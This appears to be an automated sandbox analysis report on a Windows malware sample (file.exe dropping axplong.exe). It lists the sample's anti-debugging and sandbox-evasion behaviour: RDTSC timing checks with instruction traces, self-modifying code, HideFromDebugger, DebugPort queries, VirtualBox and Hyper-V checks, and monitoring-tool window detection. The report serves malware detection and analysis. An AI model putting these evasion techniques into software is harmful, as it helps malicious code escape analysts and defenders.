Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D030A second address: 54D0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0310 second address: 54D0314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0314 second address: 54D0318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0318 second address: 54D033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E45h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D033B second address: 54D0362 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4569C797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FA22C835FAAh 0x00000011 xor si, 3B08h 0x00000016 jmp 00007FA22C835FABh 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0362 second address: 54D0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test edx, 61000000h 0x0000000b pushad 0x0000000c mov si, DD77h 0x00000010 mov al, DAh 0x00000012 popad 0x00000013 jne 00007FA29E3F5149h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0382 second address: 54D0387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0387 second address: 54D038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D038D second address: 54D0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0391 second address: 54D03A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D03A2 second address: 54D03AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 0DCA664Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0714 second address: 54C0741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C516E3Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0741 second address: 54C077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FA22C835FB2h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C077A second address: 54C077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C077E second address: 54C0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0784 second address: 54C0793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0793 second address: 54C0811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FA22C835FB5h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov ax, A013h 0x00000016 pushfd 0x00000017 jmp 00007FA22C835FB8h 0x0000001c jmp 00007FA22C835FB5h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FA22C835FB1h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007FA22C835FAEh 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0811 second address: 54C0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0817 second address: 54C086E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA22C835FABh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FA22C835FB6h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA22C835FB7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C086E second address: 54C0874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0874 second address: 54C0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09AE second address: 54C09BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09BE second address: 54C09C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09C2 second address: 54C09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E3Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA22C516E47h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09F3 second address: 54C09F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09F9 second address: 54C09FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C09FD second address: 54C0A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0A01 second address: 54C0A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C516E43h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0A1F second address: 54C0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C0A37 second address: 54C0A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007FA22C516E43h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0BC8 second address: 54D0BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0BE3 second address: 54D0BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0BE9 second address: 54D0BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0BED second address: 54D0BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0A11 second address: 54D0A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5540784 second address: 554078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 554078A second address: 554078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 554078E second address: 55407D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E48h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA22C516E40h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007FA22C516E3Eh 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530EA8 second address: 5530EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530EC5 second address: 5530F41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C516E47h 0x00000009 or si, F0BEh 0x0000000e jmp 00007FA22C516E49h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ax, 0EFFh 0x00000020 call 00007FA22C516E44h 0x00000025 push eax 0x00000026 pop ebx 0x00000027 pop esi 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FA22C516E3Dh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 movzx ecx, dx 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530F41 second address: 5530F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530D64 second address: 5530D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA22C516E48h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530D8D second address: 5530D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530D91 second address: 5530D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530D95 second address: 5530D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530D9B second address: 5530DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530DA1 second address: 5530DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530DA5 second address: 5530DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C516E44h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5530DC6 second address: 5530DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0E31 second address: 54D0E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55400F0 second address: 554017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA22C835FB0h 0x0000000c add si, F898h 0x00000011 jmp 00007FA22C835FABh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c jmp 00007FA22C835FB4h 0x00000021 mov bl, ah 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FA22C835FADh 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e jmp 00007FA22C835FAEh 0x00000033 push dword ptr [ebp+08h] 0x00000036 jmp 00007FA22C835FB0h 0x0000003b call 00007FA22C835FA9h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FA22C835FAAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 554017E second address: 5540182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5540182 second address: 5540188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6103F second address: C61046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F029A second address: 54F029F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F029F second address: 54F02AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F02AD second address: 54F02B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F02B1 second address: 54F02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F02B5 second address: 54F02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F02BB second address: 54F0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA22C516E3Ch 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA22C516E3Bh 0x0000000f and si, 93CEh 0x00000014 jmp 00007FA22C516E49h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007FA22C516E3Ch 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FA22C516E40h 0x0000002c adc esi, 2A887F78h 0x00000032 jmp 00007FA22C516E3Bh 0x00000037 popfd 0x00000038 mov si, 96AFh 0x0000003c popad 0x0000003d popad 0x0000003e push FFFFFFFEh 0x00000040 jmp 00007FA22C516E42h 0x00000045 call 00007FA22C516E39h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov edx, 5DB54BF0h 0x00000052 call 00007FA22C516E49h 0x00000057 pop esi 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0372 second address: 54F03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FA22C835FB9h 0x0000000c add esi, 4FA252D6h 0x00000012 jmp 00007FA22C835FB1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FA22C835FB1h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA22C835FACh 0x0000002c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AAE9C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C7FB65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CECFD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 2CE9C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 49FB65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 50CFD4 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05540170 rdtsc

0_2_05540170

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 2995	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1150	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3200	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3200	Thread sleep time: -120060s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 368	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 368	Thread sleep time: -110055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5588	Thread sleep count: 424 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5588	Thread sleep time: -12720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1460	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1460	Thread sleep time: -120060s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 504	Thread sleep count: 2995 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 504	Thread sleep time: -5992995s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3380	Thread sleep count: 1150 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3380	Thread sleep time: -2301150s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000008.00000002.3429938942.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2268645309.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2278299121.0000000000450000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2295623055.0000000000450000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05540170 rdtsc

0_2_05540170

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0029645B mov eax, dword ptr fs:[00000030h]		8_2_0029645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0029A1C2 mov eax, dword ptr fs:[00000030h]		8_2_0029A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

